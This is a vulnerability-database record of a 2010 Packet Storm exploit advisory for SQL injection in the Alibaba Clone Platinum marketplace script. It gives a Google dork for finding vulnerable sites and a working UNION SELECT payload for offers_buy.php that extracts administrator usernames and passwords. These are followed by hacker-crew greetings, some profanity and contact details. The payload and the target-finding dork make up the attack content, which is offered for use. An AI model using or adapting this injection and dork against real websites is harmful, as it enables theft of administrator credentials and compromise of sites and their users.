{"id": "PACKETSTORM:89091", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Alibaba Clone Platinum SQL Injection", "description": "", "published": "2010-04-30T00:00:00", "modified": "2010-04-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/89091/Alibaba-Clone-Platinum-SQL-Injection.html", "reporter": "v3n0m", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:28:16", "viewCount": 11, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "31580121c624b41d6d116c57cbebb582"}, "sourceHref": "https://packetstormsecurity.com/files/download/89091/alibabacloneplatinum-sql.txt", "sourceData": "` ) ) ) ( ( ( ( ( ) ) \n( /(( /( ( ( /( ( ( ( )\\ ))\\ ) )\\ ))\\ ) )\\ ) ( /( ( /( \n)\\())\\()))\\ ) )\\()) )\\ )\\ )\\ (()/(()/( ( (()/(()/((()/( )\\()) )\\()) \n((_)((_)\\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\\ /(_))(_))/(_))(_)\\|((_)\\ \n__ ((_)((_)/(_))___ ((_)\\ _ )\\ )\\___)\\ _ )\\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \n\\ \\ / / _ (_)) __\\ \\ / (_)_\\(_)(/ __(_)_\\(_) _ \\| \\| __| _ \\ | |_ _|| \\| | |/ / \n\\ V / (_) || (_ |\\ V / / _ \\ | (__ / _ \\ | /| |) | _|| / |__ | | | .` | ' < \n|_| \\___/ \\___| |_| /_/ \\_\\ \\___/_/ \\_\\|_|_\\|___/|___|_|_\\____|___||_|\\_|_|\\_\\ \n.WEB.ID \n----------------------------------------------------------------------- \nAlibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability \n----------------------------------------------------------------------- \nAuthor : v3n0m \nSite : http://yogyacarderlink.web.id/ \nDate : April, 30-2010 \nLocation : Jakarta, Indonesia \nTime Zone : GMT +7:00 \n---------------------------------------------------------------- \n \nAffected software description: \n~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nApplication : Alibaba Clone Platinum \nVendor : http://www.alibabaclone.com/ \nPrice : $699 USD \nGoogle Dork : allinurl:offers_buy.php?id= \nOverview : \n \nB2B trading Marketplace Script clone of alibaba Marketplace script is a \nwonderful solution to launch your own business to business and b2c site. \nScript is packed with lot of features to provide a very sound foundation \nto your trading portal site. \n---------------------------------------------------------------- \n \nExploit: \n~~~~~~~ \n \n-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin-- \n \n \nSQLi p0c: \n~~~~~~~ \n \nhttp://127.0.0.1/[path]/offers_buy.php?id=[SQLi] \n---------------------------------------------------------------- \n \nShoutz: \n~~~~ \n \n- 'malingsial banyak cakap, you skill off bullshit on' \n- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- \n- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag \n- kiddies,whitehat,mywisdom,yadoy666,udhit \n- c4uR (ah payah c4uR dipeser cengeng bruakakaka) \n- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers) \n- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;) \n- elicha cristia [ luv You...luv You...luv You... :) ] \n- N.O.C & Technical Support @office \"except ahong (fuck you off)\" \n- #yogyacarderlink @irc.dal.net \n---------------------------------------------------------------- \nContact: \n~~~~ \n \nv3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com \nHomepage: http://yogyacarderlink.web.id/ \nhttp://v3n0m.blogdetik.com/ \nhttp://elich4.blogspot.com/ << Update donk >_< \n \n---------------------------[EOF]-------------------------------- \n`\n"}
{}
Alibaba Clone Platinum SQL Injection